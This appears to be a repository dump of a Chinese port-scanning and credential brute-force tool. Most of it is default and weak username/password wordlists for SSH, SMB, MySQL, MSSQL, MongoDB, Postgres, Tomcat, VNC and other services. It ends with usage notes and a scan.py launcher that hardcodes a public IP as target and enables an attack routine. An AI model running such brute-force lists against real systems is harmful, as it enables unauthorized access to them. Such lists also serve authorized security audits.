| cisco:passwd 19 | cisco:!@#$%^ 20 | cisco:1q2w3e 21 | cisco:qawsed 22 | cisco:pwd 23 | cisco:1qaz2ws3e4 24 | cisco:qazwsxedc 25 | cisco:!@#$%^&* 26 | cisco:rootpass 27 | cisco:rootpassword 28 | cisco:rootpasswd 29 | admin:1 30 | admin:12 31 | admin:admin 32 | admin:123 33 | admin:1234 34 | admin:12345 35 | admin:123456 36 | admin:1234567 37 | admin:12345678 38 | admin:123456789 39 | admin:1234567890 40 | admin:654321 41 | admin:54321 42 | admin:00000000 43 | admin:88888888 44 | admin:pass 45 | admin:password 46 | admin:passwd 47 | admin:!@#$%^ 48 | admin:1q2w3e 49 | admin:qawsed 50 | admin:pwd 51 | admin:1qaz2ws3e4 52 | admin:qazwsxedc 53 | admin:!@#$%^&* 54 | admin:rootpass 55 | admin:rootpassword 56 | admin:rootpasswd 57 | test:1 58 | test:12 59 | test:123 60 | test:1234 61 | test:12345 62 | test:123456 63 | test:1234567 64 | test:123123 65 | test:12345678 66 | test:123456789 67 | test:test 68 | test:654321 69 | test:54321 -------------------------------------------------------------------------------- /password/ldapd.txt: -------------------------------------------------------------------------------- 1 | Anonymous: 2 | Manager:123456 3 | Manager:secret 4 | Manager:1 5 | Manager:12 6 | Manager:123 7 | Manager:1234 8 | Manager:12345 9 | Manager:123456 10 | Manager:1234567 11 | Manager:12345678 12 | Manager:123456789 13 | Manager:1234567890 14 | Manager:654321 15 | Manager:54321 16 | Manager:00000000 17 | Manager:88888888 18 | Manager:pass 19 | Manager:password 20 | Manager:passwd 21 | Manager:!@#$%^ 22 | Manager:1q2w3e 23 | Manager:qawsed 24 | Manager:pwd 25 | Manager:1qaz2ws3e4 26 | Manager:qazwsxedc 27 | Manager:!@#$%^&* -------------------------------------------------------------------------------- /password/mongodb.txt: -------------------------------------------------------------------------------- 1 | anonymous: 2 | mongodb:1 3 | mongodb:12 4 | mongodb:123 5 | mongodb:1234 6 | mongodb:12345 7 | mongodb:123456 8 | mongodb:1234567 9 | mongodb:12345678 10 | mongodb:123456789 11 | mongodb:1234567890 12 | mongodb:654321 13 | mongodb:54321 14 | mongodb:mongodb 15 | mongodb:00000000 16 | mongodb:88888888 17 | mongodb:pass 18 | mongodb:password 19 | mongodb:passwd 20 | mongodb:!@#$%^ 21 | mongodb:1q2w3e 22 | mongodb:qawsed 23 | mongodb:pwd 24 | mongodb:1qaz2ws3e4 25 | mongodb:qazwsxedc 26 | mongodb:!@#$%^&* 27 | mongodb:rootpass 28 | mongodb:rootpassword 29 | mongodb:rootpasswd 30 | root:1 31 | root:12 32 | root:root 33 | root:root123 34 | root:root123456 35 | root:123 36 | root:1234 37 | root:12345 38 | root:123456 39 | root:1234567 40 | root:12345678 41 | root:123456789 42 | root:1234567890 43 | root:654321 44 | root:54321 45 | root:00000000 46 | root:88888888 47 | root:pass 48 | root:password 49 | root:passwd 50 | root:!@#$%^ 51 | root:1q2w3e 52 | root:qawsed 53 | root:pwd 54 | root:test 55 | root:qwe123 56 | root:1qaz2ws3e4 57 | root:qazwsxedc 58 | root:!@#$%^&* 59 | root:root123 60 | root:root123456 61 | root:rootpass 62 | root:rootpassword 63 | root:rootpasswd 64 | root:admin 65 | root:admin123 66 | root:- 67 | root:_ 68 | root:1qaz2wsx 69 | root:666666 70 | root:888888 71 | root:123123 72 | root:toor 73 | root:123abc 74 | root:passw0rd 75 | admin:1 76 | admin:12 77 | admin:admin 78 | admin:123 79 | admin:1234 80 | admin:12345 81 | admin:123456 82 | admin:1234567 83 | admin:12345678 84 | admin:123456789 85 | admin:1234567890 86 | admin:654321 87 | admin:54321 88 | admin:00000000 89 | admin:88888888 90 | admin:pass 91 | admin:password 92 | admin:passwd 93 | admin:!@#$%^ 94 | admin:1q2w3e 95 | admin:qawsed 96 | admin:pwd 97 | admin:1qaz2ws3e4 98 | admin:qazwsxedc 99 | admin:!@#$%^&* 100 | admin:rootpass 101 | admin:rootpassword 102 | admin:rootpasswd 103 | test:1 104 | test:12 105 | test:123 106 | test:1234 107 | test:12345 108 | test:123456 109 | test:1234567 110 | test:123123 111 | test:12345678 112 | test:123456789 113 | test:test 114 | test:654321 115 | test:54321 -------------------------------------------------------------------------------- /password/ms-sql-s.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | rootroot 4 | root2018 5 | Admin1234 6 | root2017 7 | root123 8 | root123456 9 | root123456789 10 | 123root 11 | 123456root 12 | 654321root 13 | 321root 14 | test 15 | testtest 16 | admin 17 | adminadmin 18 | admin2018 19 | admin2017 20 | admin123 21 | admin123456 22 | admin123456789 23 | 123admin 24 | 123456admin 25 | 654321admin 26 | 321admin 27 | login 28 | sasa 29 | sal123 30 | sa123456 31 | sa123456789 32 | sa1 33 | sa2 34 | 12345678 35 | password 36 | pass@123 37 | system 38 | database 39 | q1w2e3r4 40 | 123456 41 | 111111 42 | qwerqwer 43 | q2w3e4 44 | q1w2e3 45 | 88888888 46 | administrator -------------------------------------------------------------------------------- /password/mysql.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | rootroot 4 | root2018 5 | root2017 6 | root123 7 | root123456 8 | root123456789 9 | 123root 10 | 123456root 11 | 654321root 12 | 321root 13 | test 14 | testtest 15 | admin 16 | adminadmin 17 | admin2018 18 | admin2017 19 | admin123 20 | Admin1234 21 | admin123456 22 | admin123456789 23 | 123admin 24 | 123456admin 25 | 654321admin 26 | 321admin 27 | login 28 | mysqlmysql 29 | mysql123 30 | mysql123456 31 | mysql123456789 32 | mysql1 33 | mysql2 34 | 12345678 35 | password 36 | pass@123 37 | system 38 | database 39 | q1w2e3r4 40 | 123456 41 | 111111 42 | qwerqwer 43 | q2w3e4 44 | q1w2e3 45 | 88888888 46 | administrator -------------------------------------------------------------------------------- /password/pop3.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/password/pop3.txt -------------------------------------------------------------------------------- /password/postgres.txt: -------------------------------------------------------------------------------- 1 | root:1 2 | root:12 3 | root:123 4 | root:x90x00 5 | root:1234 6 | root:12345 7 | root:123456 8 | root:1234567 9 | root:12345678 10 | root:123456789 11 | root:1234567890 12 | root:654321 13 | root:54321 14 | root:00000000 15 | root:88888888 16 | root:root 17 | root:root123 18 | root:root123456 19 | root:pass 20 | root:motianlun 21 | root:mofashi 22 | root:password 23 | root:passwd 24 | root:!@#$%^ 25 | root:1q2w3e 26 | root:qawsed 27 | root:pwd 28 | root:1qaz2ws3e4 29 | root:qazwsxedc 30 | root:!@#$%^&* 31 | root:root3306 32 | root:rootpass 33 | root:root3307 34 | root:rootpassword 35 | root:rootpasswd 36 | postgres:1 37 | postgres:12 38 | postgres:123 39 | postgres:1234 40 | postgres:12345 41 | postgres:123456 42 | postgres:1234567 43 | postgres:12345678 44 | postgres:123456789 45 | postgres:1234567890 46 | postgres:postgres 47 | postgres:654321 48 | postgres:54321 49 | postgres:88888888 50 | postgres:pass 51 | postgres:password 52 | postgres:passwd 53 | postgres:!@#$%^ 54 | postgres:1q2w3e 55 | postgres:qawsed 56 | postgres:pwd 57 | postgres:1qaz2ws3e4 58 | postgres:qazwsxedc 59 | postgres:!@#$%^&* 60 | postgres:postgres654321 61 | postgres:postgres123456 62 | postgres:postgres123 63 | postgres:postgrespassword 64 | postgres:postgrespasswd -------------------------------------------------------------------------------- /password/rsync.txt: -------------------------------------------------------------------------------- 1 | Anonymous: 2 | rsync:1 3 | rsync:12 4 | rsync:123 5 | rsync:1234 6 | rsync:12345 7 | rsync:123456 8 | rsync:1234567 9 | rsync:12345678 10 | rsync:123456789 11 | rsync:1234567890 12 | rsync:654321 13 | rsync:54321 14 | rsync:00000000 15 | rsync:88888888 16 | rsync:pass 17 | rsync:password 18 | rsync:passwd 19 | rsync:!@#$%^ 20 | rsync:1q2w3e 21 | rsync:qawsed 22 | rsync:pwd 23 | rsync:1qaz2ws3e4 24 | rsync:qazwsxedc 25 | rsync:!@#$%^&* -------------------------------------------------------------------------------- /password/smb.txt: -------------------------------------------------------------------------------- 1 | administrator:1 2 | administrator:12 3 | administrator: 4 | administrator:administrator 5 | administrator:123 6 | administrator:1234 7 | administrator:12345 8 | administrator:123456 9 | administrator:1234567 10 | administrator:12345678 11 | administrator:123456789 12 | administrator:1234567890 13 | administrator:654321 14 | administrator:54321 15 | administrator:00000000 16 | administrator:88888888 17 | administrator:pass 18 | administrator:password 19 | administrator:passwd 20 | administrator:!@#$%^ 21 | administrator:1q2w3e 22 | administrator:qawsed 23 | administrator:pwd 24 | administrator:1qaz2ws3e4 25 | administrator:qazwsxedc 26 | administrator:!@#$%^&* 27 | admin:1 28 | admin:12 29 | admin:admin 30 | admin:123 31 | admin:1234 32 | admin:12345 33 | admin:123456 34 | admin:1234567 35 | admin:12345678 36 | admin:123456789 37 | admin:1234567890 38 | admin:654321 39 | admin:54321 40 | admin:00000000 41 | admin:88888888 42 | admin:pass 43 | admin:password 44 | admin:passwd 45 | admin:!@#$%^ 46 | admin:1q2w3e 47 | admin:qawsed 48 | admin:pwd 49 | admin:1qaz2ws3e4 50 | admin:qazwsxedc 51 | admin:!@#$%^&* 52 | admin:rootpass 53 | admin:rootpassword 54 | admin:rootpasswd 55 | test:1 56 | test:123123 57 | test:12 58 | test:123 59 | test:1234 60 | test:12345 61 | test:123456 62 | test:1234567 63 | test:12345678 64 | test:123456789 65 | test:test 66 | test:654321 67 | test:54321 -------------------------------------------------------------------------------- /password/snmp.txt: -------------------------------------------------------------------------------- 1 | public -------------------------------------------------------------------------------- /password/ssh.txt: -------------------------------------------------------------------------------- 1 | root:1 2 | root:12 3 | root:root 4 | root:root123 5 | root:root123456 6 | root:123 7 | root:1234 8 | root:12345 9 | root:123456 10 | root:1234567 11 | root:12345678 12 | root:123456789 13 | root:1234567890 14 | root:654321 15 | root:54321 16 | root:00000000 17 | root:88888888 18 | root:pass 19 | root:password 20 | root:passwd 21 | root:!@#$%^ 22 | root:1q2w3e 23 | root:qawsed 24 | root:pwd 25 | root:test 26 | root:qwe123 27 | root:1qaz2ws3e4 28 | root:qazwsxedc 29 | root:!@#$%^&* 30 | root:root123 31 | root:root123456 32 | root:rootpass 33 | root:rootpassword 34 | root:rootpasswd 35 | root:admin 36 | root:admin123 37 | root:- 38 | root:_ 39 | root:1qaz2wsx 40 | root:666666 41 | root:888888 42 | root:123123 43 | root:toor 44 | root:123abc 45 | root:passw0rd 46 | admin:1 47 | admin:12 48 | admin:admin 49 | admin:123 50 | admin:1234 51 | admin:12345 52 | admin:123456 53 | admin:1234567 54 | admin:12345678 55 | admin:123456789 56 | admin:1234567890 57 | admin:654321 58 | admin:54321 59 | admin:00000000 60 | admin:88888888 61 | admin:pass 62 | admin:password 63 | admin:passwd 64 | admin:!@#$%^ 65 | admin:1q2w3e 66 | admin:qawsed 67 | admin:pwd 68 | admin:1qaz2ws3e4 69 | admin:qazwsxedc 70 | admin:!@#$%^&* 71 | admin:rootpass 72 | admin:rootpassword 73 | admin:rootpasswd 74 | test:1 75 | test:12 76 | test:123 77 | test:1234 78 | test:123123 79 | test:12345 80 | test:123456 81 | test:1234567 82 | test:12345678 83 | test:123456789 84 | test:test 85 | test:654321 86 | test:54321 87 | -------------------------------------------------------------------------------- /password/tomcat.txt: -------------------------------------------------------------------------------- 1 | tomcat:1 2 | tomcat:12 3 | tomcat:tomcat 4 | tomcat:tomcat123 5 | tomcat:tomcat123456 6 | tomcat:123 7 | tomcat:1234 8 | tomcat:12345 9 | tomcat:123456 10 | tomcat:1234567 11 | tomcat:12345678 12 | tomcat:123456789 13 | tomcat:1234567890 14 | tomcat:654321 15 | tomcat:54321 16 | tomcat:00000000 17 | tomcat:88888888 18 | tomcat:pass 19 | tomcat:password 20 | tomcat:passwd 21 | tomcat:!@#$%^ 22 | tomcat:1q2w3e 23 | tomcat:qawsed 24 | tomcat:pwd 25 | tomcat:1qaz2ws3e4 26 | tomcat:qazwsxedc 27 | tomcat:!@#$%^&* 28 | tomcat:s3cret 29 | admin:1 30 | admin:12 31 | admin:admin 32 | admin:123 33 | admin:1234 34 | admin:12345 35 | admin:123456 36 | admin:1234567 37 | admin:12345678 38 | admin:123456789 39 | admin:1234567890 40 | admin:654321 41 | admin:54321 42 | admin:00000000 43 | admin:88888888 44 | admin:pass 45 | admin:password 46 | admin:passwd 47 | admin:!@#$%^ 48 | admin:1q2w3e 49 | admin:qawsed 50 | admin:pwd 51 | admin:1qaz2ws3e4 52 | admin:qazwsxedc 53 | admin:!@#$%^&* 54 | admin:rootpass 55 | admin:rootpassword 56 | admin:rootpasswd 57 | test:1 58 | test:12 59 | test:123 60 | test:1234 61 | test:12345 62 | test:123456 63 | test:1234567 64 | test:123123 65 | test:12345678 66 | test:123456789 67 | test:test 68 | test:654321 69 | test:54321 -------------------------------------------------------------------------------- /password/vnc.txt: -------------------------------------------------------------------------------- 1 | root 2 | vnc 3 | vnc123 4 | vncpass 5 | vnc123456 6 | vncpassword 7 | vncpasswd 8 | 123 9 | 1234 10 | 12345 11 | 123456 12 | 1234567 13 | 12345678 14 | 123456789 15 | 1234567890 16 | 654321 17 | rootpass 18 | 54321 19 | 00000000 20 | 88888888 21 | pass 22 | password 23 | passwd 24 | !@#$%^ 25 | 1q2w3e 26 | qawsed 27 | pwd 28 | 1qaz2ws3e4 29 | qazwsxedc 30 | !@#$%^&* 31 | root123 32 | root123456 33 | rootpassword 34 | rootpasswd -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # 1.扫描存活主机,-H 传递“ip,域名,域名文件或ip文件” 2 | python3 scan.py -H 192.168.1.1 ok 3 | 4 | python3 scan.py -H 192.168.1.1/24 ok 5 | 6 | python3 scan.py -H 192.168.1.1-100 ok 7 | 8 | python3 scan.py -H "127.0.0.1 127.0.0.2" 9 | 10 | python3 scan.py -H xxx.com ok 11 | 12 | python3 scan.py -H xxx.txt 13 | 14 | # 2.扫描端口-p all 扫描所有端口,-p 80,81,82扫描指定端口, -p 1-1024扫描1到1024端口 15 | python3 scan.py -H 192.168.1.1/24 -p 80 ok 16 | 17 | python3 scan.py -H 192.168.1.1/24 -p all ok 18 | 19 | python3 scan.py -H 192.168.1.1-192.168.10.1 -p 80,81,82 ok 20 | 21 | python3 scan.py -H xxx.com -p 1-1024 ok 22 | 23 | python3 scan.py -H xxx.txt 24 | 25 | # 3.扫描C段 26 | python3 scan.py -H xxx.com -p 80 -C 27 | -------------------------------------------------------------------------------- /scan.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | from Libs.glo import * 3 | init() # 全局变量初始化 4 | from Libs.methods import * # 导入方法 5 | from Libs import nmapPortScan 6 | import sys 7 | logger = get_value('logger') # 日志 8 | 9 | # 解析输入的值,ip,线程数目,扫描端口,扫描服务 10 | def Parse(Host, Port, threads, attack): 11 | set_value('threadNum', threads) # 线程数目存入全局变量 12 | 13 | # ping IP 14 | if Host: 15 | set_value('Host', Host) # Host命令存入全局变量 16 | logger.info('-' * 30 + 'START PARSE IP' + '-' * 30) 17 | # hostParse() # 解析Host命令 18 | 19 | 20 | 21 | # if filesPath: 22 | # set_value('filesPath', filesPath) # files地址存入全局变量 23 | # filesParse() 24 | 25 | 26 | # 扫描开放端口 27 | # if Port: 28 | # set_value('Port', Port) # 端口命令存入全局变量 29 | # # portParse() # 解析端口命令 30 | # logger.info('-' * 30 + 'START SCAN PORT' + '-' * 30) 31 | # nmapPortScan.portScanByNmap().scan() 32 | # logger.info('开放端口:{}'.format(get_value('nmapResult'))) # {'123.125.115.109': ['80'], '123.125.115.110': ['80'], '123.125.115.111': ['80']} 33 | 34 | if attack: 35 | attackMultiThread() 36 | 37 | if __name__ == '__main__': 38 | # parser = OptionParser('usage %prog -H -p ') 39 | # parser.add_option('-H', '--Hosts', dest='Hosts', type='string', help='specify target hosts') 40 | # parser.add_option('-p', '--Ports', dest='Ports', type='string', help='specify target ports') 41 | # parser.add_option('-t', '--Threads', dest='Threads', type='int', default=5, help='the number of threads') # 默认线程为5 42 | # 43 | # (options, args) = parser.parse_args() 44 | # Hosts = options.Hosts 45 | # Ports = options.Ports 46 | # Threads = options.Threads 47 | # if (Hosts is None) | (Ports is None): 48 | # print('You must specify a target host and port[s]!') 49 | # exit(0) 50 | # 51 | # print(Hosts, Ports, Threads) 52 | 53 | Host = '103.78.141.122' # 123.125.115.111/25 127.0.0.1 127.0.0.2 54 | # Host = r'C:\Users\Asus\Desktop\py\py3\project\PortExploit\files2.txt' 55 | Port = '21,22,80,443,3306,1433,3389' # 21,22,80,443,3306,1433,3389 56 | threads = 1 # 线程数目 57 | attack = True 58 | Parse(Host=Host, Port=Port, threads=threads, attack=attack) # 解析输入的命令 -------------------------------------------------------------------------------- /setting.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 --------------------------------------------------------------------------------